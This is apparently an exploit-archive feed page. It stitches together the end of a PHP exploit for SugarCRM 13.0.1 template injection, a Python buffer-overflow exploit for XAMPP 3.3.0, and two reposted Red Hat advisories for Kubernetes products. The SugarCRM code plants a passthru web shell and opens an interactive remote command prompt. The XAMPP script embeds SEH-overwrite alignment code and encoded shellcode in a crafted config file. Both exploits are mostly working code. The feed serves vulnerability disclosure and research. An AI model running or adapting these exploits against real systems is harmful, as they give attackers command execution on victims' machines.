json_encode(["id" => $note_id]));if (!preg_match('/"id":"'.$note_id.'"/', curl_exec($ch))) die("[+] Bean creation failed!\n");require_once("./lib/nusoap.php");$client = new nusoap_client("{$url}soap.php", false);if (($err = $client->getError())){  echo "\nConstructor error: $err";  echo "\nDebug: " . $client->getDebug() . "\n";  die();}print "[+] Sending SOAP login request\n";$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];$session = $client->call('login', $params);if ($session['id'] == -1) die("[+] SOAP login failed!\n");print "[+] Uploading template through 'set_note_attachment'\n";$params = ["session" => $session['id'], "note" => ["id" => $note_id, "file" => base64_encode("{php}passthru(\$_SERVER['HTTP_CMD']);{/php}")]];$result = $client->call("set_note_attachment", $params);print "[+] Getting PHPSESSID through BWC login\n";curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/bwc/login");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([]));curl_setopt($ch, CURLOPT_HEADER, true);if (!preg_match("/PHPSESSID=([^;]+);/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");print "[+] Launching shell\n";$note_id = substr($note_id, 0, -4);curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=/test");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: PHPSESSID={$sid[1]}"]);curl_setopt($ch, CURLOPT_POST, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_exec($ch);curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=/../../../../upload/{$note_id}");while(1){    print "\nsugar-shell# ";    if (($cmd = trim(fgets(STDIN))) == "exit") break;    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd, "Cookie: PHPSESSID={$sid[1]}"]);    ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");}

SugarCRM 13.0.1 Server-Side Template Injection

XAMPP version 3.3.0 .ini unicode + SEH buffer overflow exploit.

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)  
# Date: 2023-10-26  
# Author: Talson (@Ripp3rdoc)  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe  
# Version: 3.3.0  
# Tested on: Windows 11  
# CVE-2023-46517

##########################################################  
# _________ _______  _        _______  _______  _        #  
# \__   __/(  ___  )( \      (  ____ $  ___  )( (    /| #  
#    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #  
#    | |   | (___) || |      | (_____ | |   | ||   \ | | #  
#    | |   |  ___  || |      (_____  )| |   | || (\ $ | #  
#    | |   | (   ) || |            ) || |   | || | \   | #  
#    | |   | )   ( || (____/\/\____) || (___) || )  \  | #  
#    )_(   |/     \|(_______/\_______)(_______)|/    )_) #  
#                                                        #  
##########################################################

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"  
# 2.- Open the application (xampp-control.exe)  
# 3.- Click on the "admin" button in front of Apache service.  
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *  
import shutil  
import os.path

buffer      =   "\x41" * 268        # 268 bytes to fill the buffer  
nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)  
seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;  
padd        =   "\x71" * 0x55       # padding

eax_align =     "\x47"         # venetian pad/align  
eax_align +=    "\x51"          # push ecx  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x58"        # pop eax               -> eax = 0019e1a0  
eax_align +=    "\x71"         # venetian pad/align   
eax_align +=    "\x05\x24\x11"  # add eax,0x11002300  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x50"         # push eax   
eax_align +=    "\x71"        # pad to align the following ret  
eax_align +=    "\xc3";        # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin  
# Payload size: 512 bytes  
shellcode = (  
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"  
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"  
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"  
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"  
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"  
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"  
    )

shellcode = buffer + nseh + seh +  eax_align + padd + shellcode

check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")

if check_file:

        print("[!] Backup file found. Generating the POC file...")  
    pass  
else:    
    # create backup  
    try:  
        shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")  
        print("[+] Creating backup for xampp-control.ini...")  
        print("[+] Backup file created!")  
    except Exception as e:  
        print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:

        # Create the new file  
    with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:  
        file.write(f"""[Common]  
    Edition=  
    Editor=  
    Browser={shellcode}

    Debug=0  
    Debuglevel=0  
    Language=en  
    TomcatVisible=1  
    Minimized=0

    [LogSettings]  
    Font=Arial  
    FontSize=10

    [WindowSettings]  
    Left=-1  
    Top=-1  
    Width=682  
    Height=441

    [Autostart]  
    Apache=0  
    MySQL=0  
    FileZilla=0  
    Mercury=0  
    Tomcat=0

    [Checks]  
    CheckRuntimes=1  
    CheckDefaultPorts=1

    [ModuleNames]  
    Apache=Apache  
    MySQL=MySQL  
    Mercury=Mercury  
    Tomcat=Tomcat

    [EnableModules]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Mercury=1  
    Tomcat=1

    [EnableServices]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Tomcat=1

    [BinaryNames]  
    Apache=httpd.exe  
    MySQL=mysqld.exe  
    FileZilla=filezillaserver.exe  
    FileZillaAdmin=filezilla server interface.exe  
    Mercury=mercury.exe  
    Tomcat=tomcat8.exe

    [ServiceNames]  
    Apache=Apache2.4  
    MySQL=mysql  
    FileZilla=FileZillaServer  
    Tomcat=Tomcat  
    [ServicePorts]  
    Apache=80  
    ApacheSSL=443  
    MySQL=3306  
    FileZilla=21  
    FileZill=14147  
    Mercury1=25  
    Mercury2=79  
    Mercury3=105  
    Mercury4=106  
    Mercury5=110  
    Mercury6=143  
    Mercury7=2224  
    TomcatHTTP=8080  
    TomcatAJP=8009  
    Tomcat=8005  
    [UserConfigs]  
    Apache=   
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=

    [UserLogs]  
    Apache=  
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=  
    """)  
    print("[+] Created the POC!")

except Exception as e:  
    print("[!] Failed creating the POC xampp-control.ini: ", e)

XAMPP 3.3.0 Buffer Overflow

Red Hat Security Advisory 2023-6148-01 - Red Hat Advanced Cluster Management for Kubernetes 2.7.9 General Availability release images, which provide security updates and fix bugs. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6148.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates  
Advisory ID:        RHSA-2023:6148-01  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6148  
Issue date:         2023-10-26  
Revision:           01  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.7.9 General  
Availability release images, which provide security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.7.9 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/release_notes/

Security fix(es):  
CVE-2023-44487 HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack  
CVE-2023-39325 golang: net/http, x/net/http2: rapid stream resets can cause excessive work  
CVE-2023-39321 golang: crypto/tls: panic when processing post-handshake message on QUIC connections  
CVE-2023-39319 golang: html/template: improper handling of special tags within script contexts  
CVE-2023-39318 golang: html/template: improper handling of HTML-like comments within script contexts  
CVE-2023-39322 golang: crypto/tls: lack of a limit on buffered post-handshake

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html-single/install/index#installing

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6148-01

Red Hat Security Advisory 2023-6145-01 - Multicluster Engine for Kubernetes 2.2.9 General Availability release images, which contain security updates and fix bugs. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6145.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Multicluster Engine for Kubernetes 2.2.9 security updates and bug fixes  
Advisory ID:        RHSA-2023:6145-01  
Product:            multicluster engine for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6145  
Issue date:         2023-10-26  
Revision:           01  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

Multicluster Engine for Kubernetes 2.2.9 General Availability release images,   
which contain security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Multicluster Engine for Kubernetes 2.2.9 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

Security fix(es):  
CVE-2023-44487 HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack  
CVE-2023-39325 golang: net/http, x/net/http2: rapid stream resets can cause excessive work  
CVE-2023-39321 golang: crypto/tls: panic when processing post-handshake message on QUIC connections  
CVE-2023-39319 golang: html/template: improper handling of special tags within script contexts  
CVE-2023-39318 golang: html/template: improper handling of HTML-like comments within script contexts  
CVE-2023-39322 golang: crypto/tls: lack of a limit on buffered post-handshake

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/clusters/cluster_mce_overview#installing-while-connected-online-mce

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Tag

#ssl